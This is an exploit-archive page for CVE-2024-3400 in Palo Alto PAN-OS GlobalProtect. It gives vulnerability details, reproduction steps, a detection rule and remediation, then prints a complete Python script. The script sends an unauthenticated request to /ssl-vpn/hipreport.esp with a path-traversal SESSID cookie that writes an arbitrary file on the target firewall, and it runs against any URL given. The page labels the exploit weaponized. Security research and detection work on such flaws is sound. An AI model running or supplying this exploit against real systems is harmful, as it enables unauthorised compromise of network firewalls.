PoC Archive PoC Archive
Critical CVE-2024-3400 patched

Palo Alto PAN-OS GlobalProtect Unauthenticated RCE (CVE-2024-3400)

by h4x0r-dz · 2026-05-17


Metadata

FieldValue
Date Added2026-05-17
Author / Researcherh4x0r-dz
CVE / AdvisoryCVE-2024-3400
Categoryweb
SeverityCritical
CVSS Score10.0 (CVSSv3.1)
StatusWeaponized
TagsRCE, command-injection, path-traversal, PAN-OS, GlobalProtect, unauthenticated, zero-day
RelatedN/A

Affected Target

FieldValue
Software / SystemPalo Alto Networks PAN-OS GlobalProtect gateway
Versions AffectedPAN-OS 10.2, 11.0, and 11.1 branches before vendor fixes (GlobalProtect enabled)
Language / PlatformPAN-OS appliance / VM management plane (HTTP/HTTPS)
Authentication RequiredNo
Network Access RequiredYes

Summary

CVE-2024-3400 is an unauthenticated command injection vulnerability in PAN-OS GlobalProtect that can be reached over the network when specific features are enabled. Public reporting showed chained abuse via arbitrary file creation and command execution as root. The issue was exploited as a zero-day before patch release and later saw broad mass scanning and exploitation activity.


Vulnerability Details

Root Cause

Input from attacker-controlled request components is insufficiently constrained in vulnerable request handling paths tied to GlobalProtect and device telemetry workflows. Attackers can influence file creation paths and inject shell metacharacters, enabling command execution.

Attack Vector

An unauthenticated attacker sends crafted HTTP POST requests to /ssl-vpn/hipreport.esp with a malicious SESSID cookie value. The request can force arbitrary file creation and, in exploit chains, command injection in telemetry-related paths.

Impact

Successful exploitation can lead to remote code execution as root on affected firewalls. This can enable full device compromise, credential theft, traffic interception, and persistent access.


Environment / Lab Setup

OS:          Linux/macOS/Windows attacker host
Target:      Vulnerable PAN-OS GlobalProtect gateway (authorized lab only)
Attacker:    Security testing workstation
Tools:       Python 3, curl (optional)

Setup Steps

1
2
3
cd pocs/web/2026-05-17_pan-os-globalprotect-unauth-rce

python3 exploit.py --target https://<target-host>

Proof of Concept

Step-by-Step Reproduction

  1. Confirm authorized scope and identify a potentially vulnerable PAN-OS target.
  2. Send crafted unauthenticated request to /ssl-vpn/hipreport.esp with traversal-style SESSID cookie.
  3. Verify indicator response by requesting the marker file path and checking for 403 (commonly used signal in public PoCs).

Exploit Code

See exploit.py in this folder.

1
python3 exploit.py --target https://<target-host>

Expected Output

[+] POST /ssl-vpn/hipreport.esp -> HTTP 200
[+] GET /global-protect/portal/images/hellome1337.txt -> HTTP 403
[!] Possible vulnerability indicator observed (403 on marker file).

Screenshots / Evidence

  • screenshots/ — add authorized captures of crafted requests and responses

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert http any any -> $HOME_NET any (
  msg:"Possible PAN-OS CVE-2024-3400 exploitation attempt";
  content:"/ssl-vpn/hipreport.esp"; http_uri;
  content:"SESSID="; http_header;
  sid:952403400; rev:1;
)

Remediation

ActionDetail
PatchUpgrade to fixed PAN-OS releases from Palo Alto advisory guidance for CVE-2024-3400
WorkaroundRestrict exposure of GlobalProtect and management interfaces to trusted networks only
Config HardeningApply Threat Prevention signatures and monitor for traversal/command-injection patterns in VPN logs

References


Notes

Auto-ingested from https://github.com/h4x0r-dz/CVE-2024-3400 on 2026-05-17.

exploit.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/env python3
"""
POC: PAN-OS GlobalProtect unauthenticated file-creation indicator check
CVE: CVE-2024-3400

DISCLAIMER: For authorized security research only.
"""

from __future__ import annotations

import argparse
import ssl
import urllib.error
import urllib.request
from urllib.parse import urljoin


def request(target: str, method: str, path: str, headers: dict[str, str], data: bytes | None = None) -> int:
    url = urljoin(target.rstrip("/") + "/", path.lstrip("/"))
    req = urllib.request.Request(url=url, data=data, method=method)
    for key, value in headers.items():
        req.add_header(key, value)

    context = ssl._create_unverified_context() if target.startswith("https://") else None
    try:
        with urllib.request.urlopen(req, context=context, timeout=15) as response:
            return response.getcode()
    except urllib.error.HTTPError as exc:
        return exc.code
    except urllib.error.URLError as exc:
        print(f"[!] Request to {url} failed: {exc.reason}")
        return -1


def exploit(target: str, marker: str) -> None:
    cookie = f"SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{marker};"
    post_status = request(
        target=target,
        method="POST",
        path="/ssl-vpn/hipreport.esp",
        headers={"Cookie": cookie, "Content-Type": "application/x-www-form-urlencoded"},
        data=b"",
    )
    print(f"[+] POST /ssl-vpn/hipreport.esp -> HTTP {post_status}")

    check_path = f"/global-protect/portal/images/{marker}"
    check_status = request(target=target, method="GET", path=check_path, headers={})
    print(f"[+] GET {check_path} -> HTTP {check_status}")

    if check_status == 403:
        print("[!] Possible vulnerability indicator observed (403 on marker file).")
    elif check_status == 404:
        print("[-] Marker file not reachable (404).")
    else:
        print("[?] Inconclusive response; perform manual validation.")


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(description="CVE-2024-3400 indicator PoC")
    parser.add_argument("--target", required=True, help="Target base URL, e.g. https://firewall.example")
    parser.add_argument("--marker", default="hellome1337.txt", help="Marker filename to use")
    return parser.parse_args()


if __name__ == "__main__":
    args = parse_args()
    exploit(args.target, args.marker)